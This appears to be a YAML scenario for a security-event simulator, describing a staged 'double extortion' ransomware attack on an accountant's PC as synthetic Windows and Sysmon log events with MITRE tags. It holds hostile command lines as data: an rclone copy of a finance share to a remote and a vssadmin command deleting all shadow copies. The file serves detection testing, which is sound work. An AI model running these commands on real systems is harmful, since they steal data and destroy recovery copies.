name: "Double Extortion Ransomware"
description: "Симуляция Ransomware: кража данных с последующим шифрованием и удалением теневых копий."
global_context:
  host.name: "PC-Accountant"
  host.domain: "{env.domain}"
  user.name: "acc_user"

steps:
  - id: "step_1_rclone_execution"
    template: "win_security_4688"
    description: "Запуск утилиты rclone для выгрузки (exfiltration) данных."
    delay_from_prev: "0s"
    fields:
      host_name: "PC-Accountant"
      host_ip: "192.168.100.23"
      user_name: "acc_user"
      process_name: "rclone.exe"
      process_path: "C:\\Users\\acc_user\\AppData\\Local\\Temp\\rclone.exe"
      parent_name: "cmd.exe"
      parent_path: "C:\\Windows\\System32\\cmd.exe"
      process_command_line: "rclone copy \\\\192.168.100.1\\Finance_Share remote:backup"
      mitre_technique: "T1048"
      mitre_tactic: "Exfiltration"

  - id: "step_2_exfiltration_connection"
    template: "sysmon_event_3"
    description: "Сетевое соединение для выгрузки данных на внешний сервер."
    delay_from_prev: "5s"
    depends_on: "step_1_rclone_execution"
    fields:
      host_name: "PC-Accountant"
      host_ip: "192.168.100.23"
      user_name: "acc_user"
      process_name: "rclone.exe"
      process_path: "C:\\Users\\acc_user\\AppData\\Local\\Temp\\rclone.exe"
      source_ip: "192.168.100.23"
      source_port: 51234
      destination_ip: "192.168.100.253"
      destination_port: 443
      network_protocol: "tcp"
      mitre_technique: "T1048"
      mitre_tactic: "Exfiltration"

  - id: "step_3_delete_shadows"
    template: "win_security_4688"
    description: "Удаление теневых копий (Shadow Copies) для предотвращения восстановления данных."
    delay_from_prev: "5m"
    depends_on: "step_2_exfiltration_connection"
    fields:
      host_name: "PC-Accountant"
      host_ip: "192.168.100.23"
      user_name: "acc_user"
      process_name: "vssadmin.exe"
      process_path: "C:\\Windows\\System32\\vssadmin.exe"
      parent_name: "locker.exe"
      parent_path: "C:\\Users\\acc_user\\AppData\\Local\\Temp\\locker.exe"
      process_command_line: "vssadmin.exe delete shadows /all /quiet"
      mitre_technique: "T1490"
      mitre_tactic: "Impact"

  - id: "step_4_encrypt_files"
    template: "sysmon_event_11"
    description: "Создание зашифрованных файлов на диске."
    delay_from_prev: "10s"
    depends_on: "step_3_delete_shadows"
    fields:
      host_name: "PC-Accountant"
      host_ip: "192.168.100.23"
      user_name: "acc_user"
      file_name: "financial_report_2025.xlsx.enc"
      file_path: "C:\\Users\\acc_user\\Documents\\financial_report_2025.xlsx.enc"
      mitre_technique: "T1486"
      mitre_tactic: "Impact"
